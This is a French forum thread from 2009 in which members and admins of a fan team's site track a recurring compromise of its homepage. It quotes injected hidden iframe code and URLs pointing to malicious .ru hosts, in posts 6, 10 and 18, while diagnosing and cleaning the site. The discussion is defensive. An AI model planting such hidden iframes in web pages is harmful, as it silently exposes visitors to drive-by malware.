Forum de la team Zeo-Absolu

Bienvenue invité ( Connexion | Inscription )

 
Reply to this topicStart new topic
> Chwal De Troie, ... sur la page d'accueil
wiwine
* Sep 17 2009, 18:24
Message #1


Disciple
*

Groupe : Members
Messages : 20
Inscrit : 12-September 07
Membre n° 2 651



Vous avez une cochonnerie qui traîne depuis peu sur votre page d'accueil (celle avec le fond noir et l'image-calendrier "Chevalier d'Or"). Un peu de nettoyage serait recommandé... wink.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Dandevito
* Sep 17 2009, 18:35
Message #2


Team Distro Member
**

Groupe : Admin
Messages : 52
Inscrit : 27-February 05
Lieu : Gironde
Membre n° 5



perso je n'ai rien vu


--------------------
One ring to rule them all.
One ring to find them.
One ring to bring them all and in the darkness, bind them.

IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
wiwine
* Sep 17 2009, 18:41
Message #3


Disciple
*

Groupe : Members
Messages : 20
Inscrit : 12-September 07
Membre n° 2 651



Signalé par Avast.
Un truc du genre HTML:Illiframe-B

Bon OK, je sais qu'Avast est un habitué des faux positifs, mais on ne sait jamais...
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
TomTom
* Sep 18 2009, 01:21
Message #4


Dieu des Dieux
********

Groupe : Admin
Messages : 3 591
Inscrit : 27-February 05
Lieu : Euskal Herria
Membre n° 3
IPB Version: 2.1.7



Rien chez moi non plus.
(testé avec Avira AntiVir, AVG et SpyDoctor)


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
CJ-kun
* Sep 20 2009, 16:20
Message #5


Non inscrit









Moi aussi ca fait la meme chose que wiwine, Avast détecte un virus et op il me fait couper la conection de la page internet.

Voici une image de ce que ca me fait

http://img121.imageshack.us/img121/4835/sanstitrey.jpg
Go to the top of the page
+Quote Post
dragoworld
* Sep 21 2009, 07:12
Message #6


Disciple
*

Groupe : Members
Messages : 46
Inscrit : 8-September 07
Membre n° 2 605
IPB Version: 2.1.7



Je n'avais pas vu ce sujet (je n'avais pas fait une recherche extensive, c'est ma faute).
Quand je regarde le code source des pages concernées (l'accueil général et celui du site), il y a ça dedans :
CODE
<body class="defaut"><div style="display:none"><iframe src="http://medical-static-center.ru:8080/index.php" width=229 height=293 ></iframe>

Hier, l'adresse de l'iframe était différente, mais c'était aussi un .ru.
Quand je charge l'adresse, ça ne donne rien, mais je pense que c'est ça qui déclenche l'alerte (L'alerte Illiframe = ill iframe).
Est-ce que ces iframes sont censées être là ?
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
wiwine
* Sep 21 2009, 18:27
Message #7


Disciple
*

Groupe : Members
Messages : 20
Inscrit : 12-September 07
Membre n° 2 651



Ouf... d'autres témoins. J'aurais fini par penser que je psychotais un peu... rolleyes.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
TomTom
* Sep 22 2009, 01:29
Message #8


Dieu des Dieux
********

Groupe : Admin
Messages : 3 591
Inscrit : 27-February 05
Lieu : Euskal Herria
Membre n° 3
IPB Version: 2.1.7



J'ai viré la ligne, réessayez, ça devrait être bon.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Utsukushii
* Sep 22 2009, 04:00
Message #9


Divinité mineure
*******

Groupe : Members
Messages : 1 024
Inscrit : 16-April 06
Lieu : Montréal
Membre n° 645
IPB Version: 2.1.7



J'ai réessayé vieillard et y'a toujours le trojan. C'est pas sérieux ça, je me casse un moment et y'a tous ces blèmes ! siffle.gif

IPB Image


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
dragoworld
* Sep 22 2009, 07:30
Message #10


Disciple
*

Groupe : Members
Messages : 46
Inscrit : 8-September 07
Membre n° 2 605
IPB Version: 2.1.7



Y en a une nouvelle, j'imagine que ça utilise une faille du site pour s'injecter dedans.
CODE
<iframe src="http://icq-mobila.ru:8080/index.php" width=831 height=175 ></iframe>


Un lien intéressant : ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.).
J'ai eu l'alerte sur http://www.zero-absolu.com/ et http://www.zero-absolu.com/site/index.php, je n'ai pas vérifié toutes les pages du site.
Apparemment ça passe par un accès ftp compromis (là c'est pour ovh, et vous êtes sur 1&1, mais c'est possible que ce soit le même problème).
As-tu accès à un log des accès ftp ? Ça te permettrait de repérer si quelqu'un passe par là.

Ce message a été modifié par dragoworld - Sep 22 2009, 07:42.
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Ashram
* Sep 23 2009, 20:20
Message #11


Le Marginal
******

Groupe : Admin
Messages : 521
Inscrit : 27-February 05
Lieu : into the Void
Membre n° 1
IPB Version: 2.1.7



Mais enfin ! Qu'est-ce que cette ligne à la con peut bien foutre dans le code ? On s'est fait hacker ? blink.gif

Mais ce qui m'inquiète le plus c'est que BitDefender ne m'ait encore rien signalé, pour un logiciel payant ça craint un peu...
Sinon Utsukushii j'aimerais bien que tu me donnes le nom de ton thème noir pour firefox, je le trouve bien sympa.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Utsukushii
* Oct 9 2009, 00:17
Message #12


Divinité mineure
*******

Groupe : Members
Messages : 1 024
Inscrit : 16-April 06
Lieu : Montréal
Membre n° 645
IPB Version: 2.1.7



CITATION(Ashram @ Sep 23 2009, 20:20) *

Sinon Utsukushii j'aimerais bien que tu me donnes le nom de ton thème noir pour firefox, je le trouve bien sympa.

Pas de souci : https://addons.mozilla.org/fr/firefox et tu recherches AnyColor. smile.gif


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Moïra
* Nov 15 2009, 21:55
Message #13


Grand Pope
******

Groupe : Members
Messages : 768
Inscrit : 15-August 07
Lieu : Au-delà de l'espace et du temps
Membre n° 2 350



Eh ben ça recommence, Firefox me signale un problème sur la page d'accueil et annonce un site pas sûr.
Y a des virus aussi coriaces que des morbacks, pas possible !


--------------------
Notre Dlul qui êtes au lit----------|Que ton sommeil arrive-------------|Le règne de l’ennui
Toi dont le nom est oublié---------|Et que ta sieste soit faite-----------|La puissance du bâillement
Aide-nous à vaincre l'ennui-------|Dans le lit et le hamac--------------|Et la gloire du sommeil
Avec la tête dans l'oreiller--------|Car c’est à toi qu’appartiennent----|Pour les siècles des siècles
AU LIT !
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Ashram
* Nov 16 2009, 20:42
Message #14


Le Marginal
******

Groupe : Admin
Messages : 521
Inscrit : 27-February 05
Lieu : into the Void
Membre n° 1
IPB Version: 2.1.7



CITATION(Moïra @ Nov 15 2009, 21:55) *

Eh ben ça recommence, Firefox me signale un problème sur la page d'accueil et annonce un site pas sûr.
Y a des virus aussi coriaces que des morbacks, pas possible !


Moi aussi, je l'ai signalé à TomTom en PM il y a 2 jours.

Perso je sais pas d'où ça peut venir. sad.gif


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
wiwine
* Nov 16 2009, 20:53
Message #15


Disciple
*

Groupe : Members
Messages : 20
Inscrit : 12-September 07
Membre n° 2 651



C'est vicieux... la fois précédente, mon antivirus réagissait. Mais cette fois-ci, rien.
Je me suis fait un raccourci pour aller direct vers le forum, car la page d'accueil me semble
trop peu sécurisée... hélas ! unsure.gif

Ce message a été modifié par wiwine - Nov 16 2009, 20:53.
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
TomTom
* Nov 17 2009, 00:54
Message #16


Dieu des Dieux
********

Groupe : Admin
Messages : 3 591
Inscrit : 27-February 05
Lieu : Euskal Herria
Membre n° 3
IPB Version: 2.1.7



La seule page infectée que j'ai trouvée était dans une partie inactive du site :
http://www.zero-absolu.com/forum/

Je n'ai jamais installé ce forum, vu que celui-ci fonctionne très bien et que je suis fainéant.
Bref, je vais demander à Google de réexaminer le site afin de virer cet avertissement, à moins que l'un(e) d'entre vous ne trouve une autre page infectée, auquel cas merci de me la signaler le plus rapidement possible.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Ashram
* Nov 25 2009, 18:54
Message #17


Le Marginal
******

Groupe : Admin
Messages : 521
Inscrit : 27-February 05
Lieu : into the Void
Membre n° 1
IPB Version: 2.1.7



MàJ : ne vous inquiétez pas on s'occupe toujours de cette affaire.

CITATION
En fait une fois que le site est signalé malveillant, il le reste même quand tout est clean,
il faut faire une demande de révision à Google, c'est lui qui affiche le message.


Normalement toutes les pages ont été assainies, à l'heure actuelle il n'existe plus
de pages infectées par le moindre code malicieux sur le site. TomTom va s'occuper
de faire ré-authentifier nos pages auprès de Google.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
wiwine
* Nov 30 2009, 19:55
Message #18


Disciple
*

Groupe : Members
Messages : 20
Inscrit : 12-September 07
Membre n° 2 651



Eh bien, puisque tu en parles... il y a de nouveau un problème.
Cette fois c'est sur la page principale : http://www.zero-absolu.com/site/index.php

Mon Avast me signale une tentative de connexion au site malveillant : linzman.ru./sale/pic4.php

On vous veut du mal ? sad.gif
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
TomTom
* Nov 30 2009, 23:38
Message #19


Dieu des Dieux
********

Groupe : Admin
Messages : 3 591
Inscrit : 27-February 05
Lieu : Euskal Herria
Membre n° 3
IPB Version: 2.1.7



Commence à m'énerver cette histoire, je vais finir par tout formater... dry.gif


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Ashram
* Dec 5 2009, 10:23
Message #20


Le Marginal
******

Groupe : Admin
Messages : 521
Inscrit : 27-February 05
Lieu : into the Void
Membre n° 1
IPB Version: 2.1.7



Tu l'as formaté alors finalement le site ? Parce que le portail comme le site, c'est à dire les données de l'hébergement 1&1, sont apparement inaccessibles. Tu confirmes être à l'origine de ça TomTom ? Sinon je me suis dis que ce formatage ça serait l'occasion de faire peau neuve avec le site. Alors je crois que je vais préparer une version deux du site histoire de rajeunir un peu tout ça. J'essaierai de lancer ça en même temps que les nouvelles releases d'Hadès ça redonnera un peu plus de dynamisme au projet.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
TomTom
* Dec 5 2009, 22:24
Message #21


Dieu des Dieux
********

Groupe : Admin
Messages : 3 591
Inscrit : 27-February 05
Lieu : Euskal Herria
Membre n° 3
IPB Version: 2.1.7



Nope, ce n'est pas moi le responsable.
J'ai reçu un mail de 1&1, apparemment ce sont eux qui ont fait le coup, ils s'intéressent enfin à notre problème.
Dans ce mail ils donnent quelques conseils pour parer à cette attaque virale, je me pencherai dessus demain dans l'après-midi, en attendant je fais un backup du site sur une clé USB, on sait jamais...


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Ashram
* Dec 6 2009, 15:16
Message #22


Le Marginal
******

Groupe : Admin
Messages : 521
Inscrit : 27-February 05
Lieu : into the Void
Membre n° 1
IPB Version: 2.1.7



Ok je vois. Si jamais il y a besoin, j'ai toutes les sources chez moi. Je vais préparer les nouvelles pages du site de mon côté et j'attendrai ton feu vert pour uploader tout ça.


--------------------
IPB Image
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))
0 membre(s) :

 



- Version bas débit Nous sommes le : 26th August 2019 - 06:21